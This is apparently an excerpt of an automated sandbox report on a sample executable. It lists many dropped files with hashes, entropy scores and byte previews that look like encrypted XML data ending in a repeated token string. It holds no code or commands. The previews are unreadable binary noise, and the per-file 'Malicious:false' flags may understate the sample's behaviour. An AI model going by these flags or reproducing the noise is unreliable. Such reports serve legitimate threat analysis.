              MD5:40BEDA13ED7E552D15142A0740047A64
              SHA1:DDE44F320031C2FD3FF2EA0AD8715474C7104079
              SHA-256:D9243DCA0ED4E51E20ECD8982E35D814EA95D2B6D7C3CC463D0066F931A850C2
              SHA-512:90A2B5B489FDAE622CD8328A8BEC3A7C7EC0CEC9256BE8B5EE631345EA1C5DB2C5DDC458729B00100057411C742D9D3F501C2E883BF6178B9616A9ED63F415B5
              Malicious:false
              Preview:<?xml!.Ca..h.m/..K.!q..u.FBdS......C..f..>.....u...hWmn..\M.E....6...m..8*.h.....b..s.............".$....G/.t..4.[}......\... {............q:.k...R....P....^K.k.../..s=\..v..,..;ZN...yEc..j,.2.pm?Lh..0...W....../sM59....)l....W.Q~.*.z.;<.e.Y..^.%....s?.;.}8....0S.A.?4*...d....?.|p.RH...!.\..6....$..p....(....a.......Z.......#..Vez.........j..m..0.......'6............1\R.V...Oi.^...$..3[.<..u}.Iq.D.aY.l....O...n..X..^..l5fX2....T)..F....X...G.+o...,.&.....((I.o...lI.$..S....y.`1..I..4v.......10...Lh...H....<StX.Yq.VN.y.....u.......jF.<........d.....L...DvT.D.w....~{.{.....F|%...}."..(...q.....gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1707
              Entropy (8bit):7.878042503599263
              Encrypted:false
              SSDEEP:48:jgM+Qef0HnQ1m72YFxuQucDXpO3AFWYnt08D:0cnr2EDX43A9p
              MD5:4BAB1005E717B253A81428222E2F8155
              SHA1:C833298F1C89DFBE45A49B1C79C1ECEC55C6A166
              SHA-256:33E418954C8AAB11E87EA57A87CAF67B5C817E357EF7898B3D6905D6BD4FBFF6
              SHA-512:F2EA1F3D5422D749C54EFC84AEEBE7B711AC82B8539CD84E3F09D99CDF9E9B6E3C1448FB6159B0B55B9A95B895033C9BC595CAD719F5B8CF06B18F86D8D90913
              Malicious:false
              Preview:<?xml.}2.J....i..y.<X....F..v..U.g.._.".7..._..y.4_.....4y....Y?^.....%..5Z0.?..?Q.1.3.%,p.VXjepBv..g..tu...uD.....9..M...9.H.d.r$b.b-...._........R...i}.....:`..OGd...i..H.r<".?.l..1#..h..;..5.pM....:.F.}}..{8L).c.U.^...0.d.aH.3h...WP..b..rSQ.#.....M..J._ ....`.A..A.*...QZ?.....B.^.....2.N.z5.>.NB[...}.'.@)._..V.p.....R..&B".jY.....Ij...y.o.7....C..v.0(.....-O......G...t...<5....m.G.f.H......,j.Z.+.....1...i.(..1.."..h......1..n...;8...].}..b..u...(....6...|....=....m....p.C.9..[u....`s8H..A.....c.8*.6...L...O.`.=2./..#......o)..S...I..*......@.|...%..p-.....L:.,.Q...<......J?v_............;..Si.ji.W...A..J....Y.}d...b/.u-..W.A..4......A{.0-..XhP..;u?.VN.mn"....a\.o8.>)bO.y..'a.xI..*..X.Q.D.I...i..z$.~T.....:..Y.5.s.......m.M...o.2g..Y.'.....~.B...S~.#...V..^.p...L.".)....OyU.G.|...4%.M.uBQ.U.7.....Bdx.n..V|bz.Z..........n]e...e..p...QR..=f..8*.K..5.@Z.k..T.R.u,..=.=..8...4U...>^....g....)..H..0(<......J..V`?.s.3+.f.C......ew..
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):2111
              Entropy (8bit):7.915556823753741
              Encrypted:false
              SSDEEP:48:5u+8MontIX0qmBxaa2ZmKvhiKVTlSj51jRzkrChL8D:5YMotIEqmBAmKvhNSNmz
              MD5:385EA4B9AFD402F5D32801C22F76BBD5
              SHA1:50208F5F46114F4BC68AAF2966CF9870A00E3ACE
              SHA-256:95E27007965397B90288194758A98304A1B3E5F45A5D6B2F35F7C8BAFB3F9B70
              SHA-512:0DCC0CE533407910814BAB038203CCE68AAEC691E29B0033DA31E52C5A9D275DFD01003D7646B5406D65C2440152303A6B190F1D68B4FA6C81A05726CA3921C1
              Malicious:false
              Preview:<?xml.9.U..D..).9..o.[-.O...;..WF.....;.........}n.....L...~..Z0.0.h..{....Q.N?|.`.v.U..E.+..F...R...}...M..P..$...!.Z...w.T.Z...h;.DD...........*...\........G.+.P=+W....N....O.vi...X.J2.,..~.......`h+..3....U".%.....A.pBf.W..I....Q...7j=V6-.<.......u..s.y=&..1..mkY.<.`#.&..aZ..~.......!.....-...Q......p....K.C.vV.H4..!.........V...P.}.^.Bn-[. ....9.5..D..Z..U.x.P..Ots..A!........53.....n.i.lw...y..6X...Kc......W.+..M....*.....tD..v.dy9H..[..d.h.F.....:o. ....F...E.n..3y..Un.pP.....(.8`.o$./.[2.;s7T.{...h.Gp.r\..;E..G/.!v..m*...m.g..d jG.R,.zj.....1....Y..E[.F....M...A.^..Sl.Vy.....\...V.V.pc.<.0...c.....{Q>..Z..^.f..C..`'.LV.a..N`...:../.'(....+.......I...,..`.P.?..V.\"!......Y`..86..Y....L..t&.xP..B..~:R.y...K..\-.]...l...7......).`..h}.$.].l.[z....*.e.....0h"!...8z..0T.].:.F?9'.?..>.r....^%.....s.!.nn/....&.7.....cK.S...g.y>T....6%@).Z]......N.........1p._.k...Ch..?...$-......JzE.Q../.+..,..a.LE......6. Rn...z...;..?...%.5l.3..[w....
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1732
              Entropy (8bit):7.894116625206765
              Encrypted:false
              SSDEEP:48:gn1OsGyBVnxJQOdvhgup8jihNqrJqRcbt8D:gnMZyBt1hejihsNCF
              MD5:8A24D8E4172E83E70B5D4730D99A95DC
              SHA1:8C0170157087C6958482CEFBF3B6D6A63EB58449
              SHA-256:E2BDCBD60589B8F07C2DD28E8F8D7D9ED4ED23D01DF4D7F0777D2522E574ABA7
              SHA-512:B573C68AE711FB0740741B0C21F2C3ED4DE8CBF6C78E080B85AED80FC943BF877AB6854E6985901484EBCF3B071D58ACCEB79080A0C20CC2792FB6F85309EC5E
              Malicious:false
              Preview:<?xml:'....Av[..W.0.gK...Z.]...37..jZ'...*.S..._AUY...M...*.;.:......{..%.LmD_D.~U...............[....Z]b...L..t.W.F%.....l..).......5..2.......d\oH1[j......Y^.....RF.....L.V.K...k5..ex........s..y1^*....8.....\...4...!...V..]........P...........}.EF.7P.t.1..7?.j..g..X.....u$..h`....P../e#..zh..[,ce.....0.r....?.....H+/J.....;.N,..~_AU^..o......o....y.,......Q]..)m.D6.e.............7...*..=.ldn33.,[...x....V%m...dqP..../%.........@.E.o..p.d.uqd.vA....>8......*.\i.?....s>\..?F.e4......6.o..e...'%B4...Bsc..C..3..,.@....g(..hL|...~K0.....1..kk.=....}..6.....:).LxSm.....6..Z.S\.G...`:..C...eC.....5k..w..'I<_7. ..V.....*..`q}........<.M3..}..+(..L|.p..q2....L.S...R....k...Yo..T.&.q.q.Z....n.-.G.Y2..kNN.f......eF.]'..n..m..}S....1Gw.V.q.4Q.b.........M..z..........5..Pj...gEz~..~.Q.z.L3..~o.^-a..7T..4f.E....m..O:.hk'GZ{n.Rb..jL..wYS..p..,...._U...5i..Q.Z......e.....D.A..`...y.Mi.!_.p{.%....P......aR....I..W.'.. ........auI%.r..>..B;MO.....
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):935
              Entropy (8bit):7.775426276808336
              Encrypted:false
              SSDEEP:12:5BG90Io8ruTnk5B5zikdt+BV04tmeICQhtDWHOoSsWYpSLVi3fM9VfIFujRD8KHW:5BMKnkDJ3t+304t8C2UQRp9VwU8Sd+bD
              MD5:4D2DB3258030BAACA11D16CAE546B5CD
              SHA1:ED6AFB994026A0E923A7B37802C7BF03120A5A07
              SHA-256:D2D88BA4509D228C3E18B752A0451BE736D0B497C3D84822CBB3EDE224DBFF4E
              SHA-512:A8D05D4387B48923AB597F65F86A18EDEB160F1796F9A22F21AC81899C85DB37E3452587C1EDE1530266D7F60F2AEF48655F429AF81F358B1D30B2024B41E716
              Malicious:false
              Preview:<?xml.b...^...-G.n......s..0N...?.\.._5.w.QA5k.D...H.f.C..-qk..)).S.d..Z.....|.X\.....(.....uJPf-.MK.1.0(.....|...z..]e.[F5q.\...5EWFg.x{V....A.M...QG.."....ws`w....*.I..5.7.l..y).,TgV...0-...+..K.E.H.[4+.B3...8...........(n.0.g..4...}....%H....H/.....s=~....s].)....7#.i..XV.Rmv..~.u.......".`....?...........QmH....}...V......8....7..[9.....Y.+3~8.u..."B.\'.:..jH6..ZF..H.;....Y.....x.......:..0.6s~.yRl....j......rY`.....&..V^..;eE..v.....7.....F].8.6.Gq..n.\.aB..Zw..SDc&+.).foL....g.......G{.k.{...f.^T$M(92W$z.`....f._.....O...0d.}.Mc./.....U`...=.....u?......y.K........:c..'.>.u3.G... r....EB..`..o...._.v.\<..W...ng`1_^...0..1..O.V.O.....S;eC..B.:...|.........t..4.O:i.T.bk4.N....0(...2..M.;.i....Y..(...S.....GTv.R..b./..<..:=QN.UTI..._q.vc.....2k....:'*.F..89..d....>..0..>.?..RFK.15.2m.5#..1. ......gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):980
              Entropy (8bit):7.807801245332445
              Encrypted:false
              SSDEEP:24:s/vqQBw4JOdP237sd2LxoPMbthwTX3x5h0rEKv62Hxctd+bD:svJvsAPbthwTX3xjlSa8D
              MD5:2420C9C93BCF7F5D2E1BE343FF56FA9E
              SHA1:C206F458699035A8F15649A7E5814BBDCE0A4AD2
              SHA-256:2C17FBA4226C77C615F91623B02BA3AD5D3347BC99A2625BDEDF6BA268512B78
              SHA-512:B3BE172351E9D33B275424E47280C19E20A7E32794AB363021F3A1081F5140400B1BABA2EA48C4205E7B4D411633E20C8DD108C27BFAC275661891C20146727C
              Malicious:false
              Preview:<?xml..i.P.....A.d.>...a.-J..`_..aV.=.z..`c.#"g.....W.T.L..=c.W\..KL.<....G.>&..|~.@.j.$.....&8d..#Cn>.wQ....O...0...#z.W.R.;.#S..>./.YRm....0..m....,y... .z...8\gI...Q.^.H........&-b&.......f..c.~.s.V..l..,.&.]....s..R..9..j|.=OF1y^...1..(z.9...e.;.....Q....].......Q?.....G..= ..pY.c.;.~Y|..'..T...:=.q.{...Ky...6...e.F..+..g......)..Jd..........,Xe.......fMz.9.H.pL.P.....M........Q..5-.c..kP...2...u....1...r.1.....rv.^..."....|C8..X.Fs.)..4..Xc`..b.o..&.W..FT..>.....nF.T......tL.?..e..u..t..*.....@..2.o<I2R3.. .......E..N.,&...*..O.k..0.J.V.y=YN$.m..q4.....<..;.p..]4&0.}.....t..bR.....F.T...Qt.na...".45..'0.'T..c...#4_...r.3.l.........).%.q....!>Di....G..O:.o..w@.......x~...XT...1...fv..+...@.T.r...Q%.Rj^.*Cilx...O.;T..$.?SC[u.d|.....A.W...a..MGvL...ko..i{.!....`t......5.>..WM....x.{..TLs........7.1.-D...UU.#...O..9.)x(....;"Z..A..."J.gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):2312
              Entropy (8bit):7.924664740231679
              Encrypted:false
              SSDEEP:48:SdzxUxbupycnnPtU7aiApJoSBqAovmWQMnsADiinL6K5sKdQZdsiKX8D:S5ByWMxApyTQMszieK5sKyZSm
              MD5:EF1E22DF6EF3C7EF83952E7FBD5E5747
              SHA1:E2508B0538CAE6356D678DBED5FCC8F9BA69DC98
              SHA-256:E73429D1E81907A9B7FF8C5D688EC721B04DC8F1467260EFA58DC0CE997D109D
              SHA-512:284C16A6A8D1598CD8FF5F0170F5C9AE1416E55D9B0ECBF13F879DAA86D9CBD89470E40BF0C6DE642AEB70603E8094F61F4DE2CB597EFD783562F05A6848A68F
              Malicious:false
              Preview:<?xmlS.U...$'...=.!..G.....4M....o.F......s..x....GA...(...0.k.'#T1@5r&O....xg.i.?....0..xy.l...<./...!..P....M.g.)...\..L|./..`.....'.....E}....^..>.....L.w...\.....Y.....D..'>.l..[.......>..J.Sz.6......Sm.S..Qh....y%.....d.f<.]y..7=..2.[...{...'...O....1.....i..#.3.h....+....d.....;..'.....j...%(..y`...y[..x.-..0:nM.gB:v|..w..9..mI#...........0..L.2M..`.Qc.=...LqqE..>40..H.v..R$....,*....&.......`S..eA..<..z.#.3........H_n PL.....7.e.h..I.k...jE.0..cp>-...G.$.9...<...O..]*.N...~H...y..0]N.....Z.....rzEsQd.r.w.V....s...D..+.lu1:tD.".|/.@.......Tg...l\^J.......N..J.....-...+..LS...ZA1=.K.......HS{..ip.{L2lD...9<...4..K.....C.._........-.... (...!........T..Eo.|..<.......f.cj...R[ JEN.g.C;..7.....Na$.t.6c~y..`.@.4Y...k7s.4U.R......?.......R.D..&...m.Y.h..@..a...(..P.)..x.)..L.4&..w.....S-eQ~...CS...z..|:.E...A!.-. G.l.....(...eJ...{k.SJ......b(..;...x..a.....S.?../.K...o.s.....e?..K.T.....V.....J....m^.,....X.o..W.SP.Y7^.PO...w.....
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1731
              Entropy (8bit):7.884595437463097
              Encrypted:false
              SSDEEP:48:rFRm6Q/q1wjBkOscKab5tGdZAouiWtTX2sY5A7S4bhFR8D:r7XQywjBk7cdbGPNuB9DY5A7fhg
              MD5:3B24C6D0376D29BBE766CF9BC36E7006
              SHA1:44C611908C635FBF191C318674480E27910ECD20
              SHA-256:25D856D86D43F7FDF96094852B5B5CA3A7F808592783294C73F7B58FFBC7DCC1
              SHA-512:B8B232ACB288880208400EA6676054CA8EFD8954A9DA38224C78E7FB5857F321B227C08AC36B308D85EEC9848391FD496B9C3E38FDFDECF5D838C87D83F29608
              Malicious:false
              Preview:<?xml...+.j\.nz.{....mK...+......h./r...`"._]..u...Q.G..$..a.b2m...0Jrt.wm.T3c.gF.....p.Uh....<4...].Kvr.2UI.[<zF..A....'.La...i...^f.l3C..}......S.-t.-]u.......`.Y22x.L...Z..j....... ....Y.....I......"\..a.....2|f.G.,.V..@.......M....v0!....7....xJqP@...(.........._.^r..f..e...{g>..9:,..y.B>........Hk.'.)._.,.e...3.:)x.;".9gGk.f..4.n.V.o....Yr.T.C.M..*.Z.f...A|]P}&.*e...S8w....p>H....HSs.......Z...V...s.....3%.'j`.n....5...#.,....cS:....F7.]m.0..EVZ.M...N&.p<t3^.W.......!.m..N.s(.qLR...x<@.\...Fn.....@D.3.`j.E.....4..u.TF.DJ,....".....-.P..........y8.;...j.m(.\NF;......s.........G.8y..=t:...~.-X...].lw..W.s.L/U*....x9.*...."+. O|U.%.Of.H....(;........:..P..p.}=..:..`6.@..w..y.;....NA%}.Hl9]......p.9.X.x.O....D.c,...c.a.S.....U..`..R7.j..9.....:9.....txR.x..ASV..6....p.....Q.PH.e!.g"7..Fh..p....Iv._....s.JYV.......5..;@...8..%....-..H...{......!N..OQ.P..B4......o.H..[....{.=.......W`...:;4A.&..C(.*....8.....ha...$.s.....'..)...Y
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):916
              Entropy (8bit):7.765443462302167
              Encrypted:false
              SSDEEP:24:GnX2i8fYv2sqSfJnO+aTmGgPMEydGcssBKd+bD:GnXZdqSftaGMEhcssBs8D
              MD5:41487CAADF6EEB4A294889C7D86A5694
              SHA1:C267F23252F965E1F23479AC8B31D3265D4821DF
              SHA-256:82EC0F131B8A5E2FB72BED5599B6F53258AC2436644A6619AD755CFF69DAD4C4
              SHA-512:5FF8D5277DFDB11373EF56DA85267CA1A31A424C324872FA41A97B91EBB2C16B946DBBF07D5BB3FDD2B15236241CB4349E0703BF6C201D0286CC91EB868DA24A
              Malicious:false
              Preview:<?xml...O.T~.....'..1......Bz..5....#......n.......Mz....Dy.5HM.F.A.k.....au Gg...2#..y^..9.Z..i>.....).l9..u.=...O ..!\....)..M.D...._.j.."...%.|.d'n.WWy..C.....N....?<Y1....Q>...!p..d..6.0.hf#.Ml...!..<..l.].b.^....a.>7.V@..Z......3..6..b~.....CB.b.....JW.N..?.....Ib...M.WQ....m..dG....e.......&.b......];..4../ME.}.k.E.......G...l.MY%i....[6Qt.H.O.{l..+...'$..H?Vu.4.@F7.l#{.5J..dR.$i.5...Z.`OnM.xV`R.(.........L%.&.............k...0zV:../Cv....z.Hj.g..._g......*.].Y.@......}...D....o.o....q.RGnP....<7a.5..YU.kR..+..j.0D/...9n.^.9L\.....QW(..$wK...1.y.4..AZ...r.cQ....4.[$..@.T..|I..p.<..VP..tv.%.P.....[N....(.&.....4NJ4(+.T....Ez.....Us%...H.....t...[s^...:|J.....@.0P4.Z.CY..a.K.G3...(d.2.7...+....+.K.JP.b]......f.0.7....`.<3:o...Yt..Iq..0...B...i.Y..mR..u.}.<.D..f."t..xC..r.......gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):887
              Entropy (8bit):7.756271675126296
              Encrypted:false
              SSDEEP:24:nO+sdFrmbnvBducmzEI4ZdJtQURYz70LLid+bD:nDszrGLZmaZdzQUW8D
              MD5:64B982C4CE9A0C9D9501BFB2D909326E
              SHA1:1079E6F0534F331BE22EF82C32978008F6B11DDF
              SHA-256:F1E2B5CC9C7CE9695A8C841D3F976C894CFAA0B8FCC13B21A782286C62A5966F
              SHA-512:9D2CC6047027A9FE1186778BBCCADAAC3C49ABC0A87FD4766F2AE9B3D711E2B3B2738E007CC0DF8556A3A96155C55DFB9E8B3301931891407E4AAC4E5E84C2BF
              Malicious:false
              Preview:<?xmlc...e....{...CtY.:..R.7...N.].C..d..D.`[......S.+...LS?...e......7~...5...p.13.....|.8'h....Y..q.)A9A.9G-..%.......7K%.k...%.44V.wB3.^S.z..0.^.>...:t...s."...V.AX..h......m..H..hr@.....D.....z..V...W.1....A..Wc.{.s.......qKZ.j..4..q`.m...=.....b=^.......b.].0/l......2..CA....D..>)..Iw.......T......r.w.l6.5.I0.@0Q0..}..$.K\._o....s+l.V._P.../.9...$<..+..?.I......m:... ^....P....:H.6....-$........W.(5y.0&a...Y..m.~......r..J....>.y.M.c...?hRS...%..d3.?.M..HZ.i....p ..D...t~..`.'....l....x U.6,.....;.:.#.).|]eas..(-\.`.......~D...^8....I......4...!?.|}.....U*..9;9."C.L.D9?+.+.^.3....O.(2..\.v..Z.Y.a.E...g..l.....B.....>~.g.9..h.-n...R+...).x5....._.;..."*.b.{....NDr.V..-Z..f.....x.5u.F9*u......@.`..(B..g|..l.7YJ..e#...g?..<..4L.a.M.2r\....?.w1..... .......!B..k.gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):975
              Entropy (8bit):7.779350631251043
              Encrypted:false
              SSDEEP:24:zeChcayXio7ffrs08A08NwtYKdpsBPeER1Dvd+bD:zQio7f4juNAOT8D
              MD5:B4941163C490882AEEA7289A4D3914D7
              SHA1:7ECBA0CBA55164C0029D62B6478D36F25638E3C3
              SHA-256:E017EC89843B16C3A7636C31106938EC7E8A40FB7CE2F6346E3DE1A6AB7B7377
              SHA-512:2208C615D57D059169BFE4D792FFA60E2296377C347632A48EBDF9BB7D8ADD2002508E71BE4A94A6E3279D3285370B6EEB99446E072CD2977E4FE41DB419D7DE
              Malicious:false
              Preview:<?xml..s!........_....0.d.@T..) .s..5...$.@".q...1....W...y.3Y#>.N.,...13..L~k..I...=..&...&~.9W..".....0.....=F%..$S...i...Bt.7.I<.[=...Zx.c...x.yO...pJR|.M.X..?cxA.....E.2.d.0...5v....b.@."~....d.E..F..v.k.*.............u....2o.`...+.S.1=|Q..DN.NLb1.Z.w.0.3%..X..*8...:.1X^8......;.8x......p.X!.....[Y.....C. ......n.BRU.._.8...>..%.0.I%O..1..._.%.....HPh.qj.N.....G1.._..=...Gr9...F.'^..".}9.L......=.....!..#.\.n.8h..zJ.9.Z@..c+..*K..V8.3.MI.K|.N.3..l.|.....|3gM..y.....]Hqh....[..8.S%...".-..i1.7...\..W......eN....#W6.E..$....\.......t.>]0%.K2.J%O(..;..y.2.c.r".N...2..xj.g.a'k....-2.%?....b.....[...\.4..c|...7.v.......R).hP..vq.=........z..=fnJrx.[.......S.J...6.9y....I...4....yxwL....0zL....&....C.taC..z|/.o.'. .xP.%.4..9?._...Z...J..:.<a.U#(zq..U..Qo.[.?.t....c...Mc..D|-.#Kw=...C.r.....g.=y.S..t,.r.]D.......x....#p.........lM. >..M.8 ..Y...h.%.hXgigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):719
              Entropy (8bit):7.688881218700072
              Encrypted:false
              SSDEEP:12:4E8lSRR/F9mcIblJNEIXMqCp+rEZ6T85MIjW/pY0fNuvzbpYO5IYts5Pdxa3ciik:4peR99mcAlJvja+4W8SIjD08vzbGO5qy
              MD5:72C44F1F2BB8F105C70F6D8D44CE0A46
              SHA1:BDBAFAD0F6AE0E12C4383A5C52896069399775BF
              SHA-256:23DD936C5FF58C290D8B8A2314E537AC786B2B66D1A50F9A1D353588D312CCD7
              SHA-512:6B561ADA6F63DF9C90BF541ED84F519B6964C78E3B47E9F259CE1602B7F09E0615EC87F058E440A076A5A3C394E60B832ECFCADD0B20B35FD92969F550E1A306
              Malicious:false
              Preview:<?xml...h.M..u.;Q.o'......8..#....!;-..v1vw..`..{~.y...e..)Zh.k|......O.Ms.`......C..~..34......'`l.C.66........~;?Q.E,..A..@o..&.8......[. ....+.b.....*1.V..;.9z....}.)7....K..o.p.=.3.L..!...D.....[5...4z.....un.P.$.p..?U0#Z"\..../........,..*.%..4|....A.....=.....s-..-........\.Z..H....xE...x....kCQ. ...{A.....=.6..C.yS<4sG.|....k.....fR...|...6.N..6-.-...!r.i.........5h..........[...`....].(>...<|.._L.....u.^....|6..../.n*...\......dX.?<.......5.....=P...C.B/...s...A...w......60.N..B.*...3...W.9aQo...b....w.q.YP...\.-x...).w...L.............c=.F.i...T....L..*...M.D./.y..Z..F.8.u.m. ...42Q.&.Ul..[gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1031
              Entropy (8bit):7.82491826796427
              Encrypted:false
              SSDEEP:24:w+kUYkw65WRyKaEXESyMwD8bNLR+jH/KnYhG3Np1+d+bD:w+k/6YsKaEXEKwDOEIeG3Bw8D
              MD5:1F6423ADF540B5C52F2852F7E6A894B3
              SHA1:FB52E1A6AF7169A6CB3B5C58F70446DB1710C72E
              SHA-256:B1B74FFDF3CF39F5C6D1B815932BB714AD0DD199C3B3FF3C3FDCD43BE3EEE742
              SHA-512:952502231DCA73F8D68D5E5ACA7B43CF2A726A1FD6B97388B8D00AFA67B53C8DFC10053E507057B4B11E02A7E3B9FBCE16CC4EFB06B5A9ECA601BB572245D155
              Malicious:false
              Preview:<?xml*k..p..LF.=<.....\..O...sp..@.[..........#X...d.t.6RH...W........Z..EB.fO..IbK...&..;.h.+...tB.@B.E....t.u.^..o.R..*7o36.T*..V..|..U....@..l.......U..@.L0.O8.JI:V....A.0.0>>........O...&P..ihq.3S......b.cd...n.....Sb.E.a.87e..%3..}T.....d..Q(..[.hT....5.T..k3X..\..FZv_V.....@TS.TP..r.I..QI+.$..(...,>X..V.1| ..`..Wd...F..x....x.Ok..,8.s...,VL.. ....c&...C.)2./.zd.|JV....?.....X.nM.0...=.0q..!..{...vS.N.....B.^..K..:*.d.......R+.[4.V.I..m..K...^...v[..UK..._..!...R.X.y}.N...m.v.5./J..WKu.......a...{.?.'....j.nr.?oj.e..#....2k..L....m%.^.........0l.C9..88k%[..~...Q7.....(..zI...]....@~..(....J.....m...v^..zO.'<..|...FwR.B=......1.W.V........Z^.9..d2..6P..|.1.."........).6....f.(.K...Kc...O...L.v....q#K....5.........b..d....;.q..n-'.9..' .0:1...vZ..9..M..mv...Y...m..z.q".+.Y[....4-.H....B.#.r*..S,...2.:fi...i4.....c..Re$.l..,..9....G../.2..j...yA.9..r..!.....l..Q\.K}...JF/...K.W......P.a5.51.gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1143
              Entropy (8bit):7.823051429868343
              Encrypted:false
              SSDEEP:24:5MQhpKltSw6UDqfiGyBA+WHbToIlrG+8ZTPPWj936OfwOSlotd+bD:agwSTUDqqryTowWbPWj9qOfulE8D
              MD5:39CEA908B8071C69C9DAD9AD18723D4C
              SHA1:B23FE59EB9DEB8C7D02D8E05278960453AD8C3A4
              SHA-256:9360AA9AF7E7D333EBFA151C998B9E5B8C90409D8315B2D91EF59BA80D859630
              SHA-512:D57B5ADB3C85E111E359BD1DCA7F456976DA32EE99E01FF46E288347A6E5AB585D16B14AA7CF770DDA5983B887ABDD0EEB0D2336B8E7E9895D3E368FC599B43E
              Malicious:false
              Preview:<?xml.;.5......x./.6X..g.m.P....2.$^ ...P..L...{..T...4G...9...H..Q:...9.............-H.2..-....Zuab..1...C..'...*&.y5..g%BF8.].....x,YL....'...+...~g...J...=~..-..7.@...]0t..[...#.]7.U..U....~....&..:e.#:................A/....`8.......5.]^5.^X.j.M..C..Z@.D.@C..N..|...J...e.b.J....sS..\.qL9(...M.Bw.C........-%..A.^w....`.j.e.....\.m..Z...Zm.UZ..0\xj..d#3.)......W[E.e...H.... ....\.PQ.....#}.%...4._....'.$..J.A]....#...y...n..s....O.d...p\y..x.r...[.P.V...}.<....n..;....:.)...[g...........|.../7.!.K)..Z..;....-...[.T.z.).....H/...j..r.E.9...,M..:G5DP\S.95..|.5..?.~.8..5.J..1.Y........+...h..Y..Y..pC....3y..T.'{..m...68....{......5d......=Y......z.n.m...D?8..... .'..\o..,B.......4.Y.0.k.p.>.....w;.......R..R]....N....(.G.iJ.s....J...p.#..(N-"....&..k..L..Z...z.......w.....wJE..g.B.......\w.1N..s.....1@W...V.5..5@.~.......#.....~.E.U.A[..NB..]......y*py......&.=...x.....4......V..#/.!u.......@8.OXm_h.#..I.n+y..G
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1503
              Entropy (8bit):7.835577171532564
              Encrypted:false
              SSDEEP:24:gGdGNsoAh6R7tFrTbU6FE7S39T6haWw6yqg64Czd4hx055X5ZwGId+bD:gP3qc7PUPSNT6Vo+OotZI8D
              MD5:CB76B8EF825BD97E2602C670FE3B8EA7
              SHA1:AB6B84CC09BD2F2BA9C8EFCB17540428D7683B5B
              SHA-256:F76727B12C7AE332925435C8825D2F7FA21D8B041B34EC5E5C05254FA2EA524E
              SHA-512:05B7F0157B31510B6640C027D4DA93F7E6544449711BEB3B63229D5BA359BD21CC0EFCA398864FEEC7C86CC497C5F5384B28149DB64F102E8D03A6594FADE209
              Malicious:false
              Preview:<?xml...~...*<"...0..\MU...?'9>8..!y..DJ.90.y..{..S...D..........p.\.0..6.?.9 ..k...<...7.AvI8..t.q.o...].G....Dc...... ...]......#J.I..\r.H..A{..6..\...u...-..?..k.H...Sc..5Kp{..w..!.(v..'..m8M...G../....t?..c..V..4.....L............V.8.....y. .....v....e@yL#....oft..?4.b4.(".Q.(.l.f..)."e.{g.,.7.Z.V.E...L.6k..e.f..:.....'.3.* ...,..Ds.E.T#....G.!...C..M.;..B|.C..V...X..h..,to....P9.U.K..~........I..KX..~..B.J;..+H_.8..7D...G.,>U....../....y......~gP.F.o...IS.g?.Nf...:....fh....r=N.n5..W....4...?+.m.T..~.s5.R........BP......(/....t\.r)..r......-.y..xoCW$..\....f2.....Y...n.+!....am.IN........k.<.0...Z....z...,...%-.BV..}.j.$e.*f.+.w..u.....lW.`...m{...~..".Tb..>xJ......J.vc..k..(YXf........>^..(EI.h..i..)r.....h...(g...r.t...Q..)cCotf..1u>.5._m...UO.u.2..I..'.1MJ.!..*.R.d$.1..^.Z.-.I.#z..dm.....=.......'.*.`.-....Y.M,..?.M.s....!]....}.{...!....My..5.-.\..2.!&.s.-.}.&..^6e.l@..$.:M..B.8.....##..MY..........f.t...P.NY0N.];..-B.6....R<~
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1036
              Entropy (8bit):7.780276195610981
              Encrypted:false
              SSDEEP:24:G+oDw+DqT6hGS6qw3N7G3TxxT47SQXI/kqnFsshfRs/Eh73id+bD:G+sw+uqGSU3NExZ4GxjnF7sMR3k8D
              MD5:729392D014863A23D7C261CC781AABDF
              SHA1:85B0C4661922F78CDE2AC78FEB6F035F219578BD
              SHA-256:7B100A66E0BF282F80A795944F50BDE73E99D9D0384B16D45DD42DCE83DC6D14
              SHA-512:7F075026A4D4FCAB015165114F0659C915290F618E54465F6823F93D8DF9C07477CD0548F0FA87E4CDE30707FEAF2D995D1B28AFC2286F31ACDE0137528AB8F3
              Malicious:false
